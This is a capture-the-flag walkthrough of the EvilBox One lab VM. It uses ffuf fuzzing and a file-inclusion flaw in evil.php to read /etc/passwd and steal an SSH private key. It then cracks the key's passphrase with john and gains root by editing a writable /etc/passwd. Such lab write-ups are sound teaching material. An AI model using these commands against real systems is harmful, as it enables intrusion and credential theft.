Post

Vulhub - EvilBox One

Posted Updated
By Dinh Hoang 2 min read

EvilBox One writeup

Set up

Download ova file from this link and import it to Oracle VirtualBox.

Recon

Firstly, we use arp command to explore target’s ip address

1

arp -a

The target’s ip address is 192.168.56.101

image

Then we use nmap to discover open ports in the target

1

nmap -Pn 192.168.56.101 -sV

image

so the target is running apacher version 2.4.38 and SSH server is enabled. Go to http://192.168.56.101 and see the default page of apache

image

Use fuff to fuzz endpoints of Apache, the following command use -c for color, -e for file extension and -recursion to enable recursive fuzzing. I used to use seclist web-discovery for word list.

1

ffuf -c -u http://192.168.56.101/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -e '.php' -recursion

Apache has endpoint /secret, and because of -recursion option, ffuf adds fuzzing from /secret to the queue, then it found evil.php file in this route.

image

image

Go to /secret/evil.php, it is blank page

image

Next we will use ffuf to fuzz parameters of evil.php, -X option for request method, -fs to set negative size to 0

1

ffuf -c -u http://192.168.56.101/secret/evil.php?FUZZ=/etc/passwd -X POST -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -fs 0

and we see that evil.php handles command from request parameters

image

Open http://192.168.56.101/secret/evil.php?FUZZ=/etc/passwd in the browser and it shows passwd content

image

RCE

From this path traversal, we use the seclist to dump sensitive files from host. But some files are in user’s home directory, so first we fuzz current user by using .bashrc file

1

ffuf -c -u http://192.168.56.101/secret/evil.php?command=/home/FUZZ/.bashrc -w users.txt -fs 0 -v

image

so here we see the current user running Apache is mowree, from this we can dump private ssh key from /home/mowree/.ssh/id_rsa

image

Change permission of id_rsa to 600, then try to use this SSH private key to login mowree but openssh asks for passphrase for key. Maybe we can crack this private key? Save id_rsa to kali machine, use the following commands to crack private key

1
2
3
4

# create hash file from key
ssh2john key.pk > key.hash
# crack hash
john --wordlist=darkweb2017-top10.txt id_rsa.hash

image

See that the passphrase of private key is unicorn, use it to access target machine

image

Privilege escalation

Use find command to find files that mowree has write permission

1

find / -type f -writable 2>/dev/null

image

You see that mowree can write to /etc/passwd, easily use openssl to generate hash for password. For example, the following command is used to generate hash for password root

1

openssl passwd root

Put the output hash to passwd file

image

and then access to root user with password root

1

su root

image

Vulhub
vulhub
This post is licensed under CC BY 4.0 by the author.